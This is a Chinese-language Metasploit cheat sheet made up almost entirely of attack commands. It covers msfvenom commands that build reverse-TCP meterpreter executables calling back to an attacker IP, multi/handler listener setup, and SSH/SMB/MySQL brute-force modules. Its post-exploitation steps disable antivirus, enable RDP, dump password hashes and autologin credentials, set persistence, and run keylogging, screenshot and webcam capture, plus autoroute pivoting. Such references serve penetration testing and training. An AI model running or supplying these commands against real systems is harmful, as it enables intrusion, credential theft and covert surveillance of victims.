search xxx      #搜索某个漏洞
use xxx         #使用某个漏洞利用模块
show options    #查看配置选项
set payload     #配置攻击载荷
exploit         #执行渗透攻击

reload_all      #从目录重载所有模块。导入模块也需要用到此命令。
back    #后退命令，移出当前上下文，用于模块切换
info    #目标和模块详细信息
check   #检查目标是否受某个漏洞影响

sessions        #会话管理
sessions -l     #列出所有会话
sessions -K     #终止所有会话
sessions -i id  #进入某个会话
sessions -v     #以详细模式列出会话
sessions -u     #在许多平台上将shell升级到meterpreter会话

show options    #显示可选选项
     auxiliary  #显示所有辅助模块
     exploits   #显示所有漏洞利用模块
     payloads   #显示所有有效载荷
     targets    #显示所有可用目标
     advanced   #显示更多高级选项
     encoders   #显示可用编码器列表

unset [Module Options]    #清除Module Options

use auxiliary/scanner/portmap/portmap_amp
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/xmas

auxiliary/scanner/ssh/ssh_login     #SSH爆破
auxiliary/scanner/vnc/vnc_none_auth #VNC空口令扫描
auxiliary/scanner/telnet/telnet_login#SSH爆破
auxiliary/scanner/smb/smb_version   #SMB系统版本扫描
auxiliary/scanner/smb/smb_enumusers #SMB枚举
auxiliary/scanner/smb/smb_login     #SMB弱口令登录
auxiliary/admin/smb/psexec_command  #登录SMB且执行命令

auxiliary/scanner/mssql/mssql_ping  #MSSQL主机信息扫描
auxiliary/admin/mssql/mssql_enum    #MSSQL枚举
auxiliary/scanner/mysql/mysql_login #MySQL弱口令扫描
auxiliary/admin/mysql/mysql_enum    #MySQL枚举

use windows/meterpreter_reverse_http

-E   强制编码
-e   要使用的编码器模块的名称
-f   输出文件名（否则为stdout）
-t   输出格式: raw,ruby,rb,perl,pl,c,java,dll,exe,elf,vbs,asp,war等
-b   要避免的字符列表: '\x00\xff'

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali监听端口 -f exe > msf.exe

参数选项：
-p          指定的payload
-e          编码器，x86/shikata_ga_nai
-i          迭代器，对有效载荷的编码次数
-f          输出文件的格式,exe、dll、raw

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.15 LPORT=6666 -f elf > msf.elf

run post/windows/gather/checkvm     #检查目标是否虚拟机
run post/linux/gather/checkvm
run post/windows/manage/killav      #关闭杀软
run post/windows/manage/enable_rdp  #开启目标远程桌面
run post/windows/gather/enum_logged_on_users    #列举当前登陆用户，和最近登陆过的用户
run post/windows/gather/enum_applications       #列举应用程序
run windows/gather/credentials/windows_autologin#列举自动登陆的用户名和密码

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #payload要和持久化所用模块的payload对应
msf5 exploit(multi/handler) > set LHOST 10.1.1.15
msf5 exploit(multi/handler) > set LPORT 6666
msf5 exploit(multi/handler) > run

getpid          #查看当前Meterpreter Shell的进程号
ps              #获取目标机正运行的进程
migrate 476     #将shell迁移到PID为786的进程中

run persistence -h    #查看persistence模块帮助信息、参数。

#举例
run persistence -X -i 10 -p 12397 -r 192.168.34.132    
#若监听时一直报错，换个监听端口即可。
[*] Started reverse TCP handler on 10.100.130.180:4444 
[-] Command shell session 1 is not valid and will be closed 
[*] 10.100.131.192 - Command shell session 1 closed. 
[-] Command shell session 2 is not valid and will be closed 
[*] 10.100.131.192 - Command shell session 2 closed. 
[-] Command shell session 3 is not valid and will be closed 
[*] 10.100.131.192 - Command shell session 3 closed.

pwd、ls、cd
getuid      #查看当前权限
getsystem   #获得系统管理员权限（要本地管理员权限运行）
hashdump    #抓哈希密码
sysinfo     #查看系统信息
idletim     #查看目标系统已运行时间
route       #查看目标机完整网络设置
shell       #进入目标机shell，exit退出she
background  #将meterpreter隐藏在后台

upload ./1.txt c:\\1.txt        #上传文件
download c:\1.txt ./            #下载文件
search -f *.txt -d c://         #搜索文件

keyscan_start   #启动键盘记录
keyscan_stop    #停止键盘记录
keyscan_dump    #转储键盘记录的内容
screenshot      #抓取截屏
webcam_list     #摄像头列表
webcam_snap     #摄像头拍照
webcam_stream   #抓取视频

#Kali-Linux下登录远程桌面
sudo rdesktop -f 目标IP

route add IP 子网掩码    #添加路由，先background

meterpreter > run get_local_subnets

meterpreter > run autoroute -s 10.0.0.0/255.0.0.0
meterpreter > run autoroute -p      #列出添加了路由规则的存活session